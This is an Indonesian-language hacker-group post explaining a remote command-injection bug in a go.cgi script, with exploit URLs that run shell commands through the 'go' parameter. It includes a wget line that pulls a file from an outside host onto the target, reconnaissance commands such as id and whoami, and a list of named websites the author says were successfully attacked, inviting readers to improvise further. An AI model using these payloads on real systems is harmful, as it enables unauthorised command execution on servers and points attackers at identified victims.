Cgibin

Author : Watchers

cgi-bin/go.cgi?go=|[command]|

Lagi lagi bug baru dari /cgi-bin/. Target memang rada rada sedikit, apakah karena belum dipublikasikan atau memang para webmaster tdk suka menggunakan cgi-bin.go.cgi belum jelas. namun dari pencarian yang penulis lakukan, masih sedikit yang menggunakan tools tersebut.

lebih lanjut...

bug ini sama seperti yang bug lain, yaitu kita tetap bekerja di web browser.

Berikut ini syntax penulisannya yaitu :

http://www.domainname.com/cgi-bin/go.cgi?go=|command|

Dibagian command kita bisa memberikan perintah perintah linux. Karena memang target ini adalah linux.

Beberapa contoh perintah yang bisa kita terapkan antara lain :

1. wget

http://www.domainname.com/cgi-bin/go.cgi?go=|wget www.jelaga-online.org/index.html -O /tmp/test.html|

2. id, ls -al, whoami, http://www.domainname.com/cgi-bin/go.cgi?go=|id|

dan yang lain lainnya tergantung dari improvisasi anda.

Dari beberapa yang penulis coba, ternyata mendapatkan OS REDHAT, DEBIAN dan FreeBSD. Mungkin bagi teman teman yang lain bisa menemukan improvisasi yang lain.

Beberapa target yang berhasil penulis test antara lain :

1. www.canada-immigrating.com

2. www.messiahpage.com

3. www.lpwi.org

Mungkin sekian dulu, dan #renjana sangat menngharapkan masukan masukan dari yang lain, agar share ilmunya tetap terjalin.

Thanks :

Phaty atas sample nya

Cupid^ yang telah memberikan bug nya 3 hari yang lalu

Teman teman semuanya dalam renjanaCREW.

Keep on Learn everything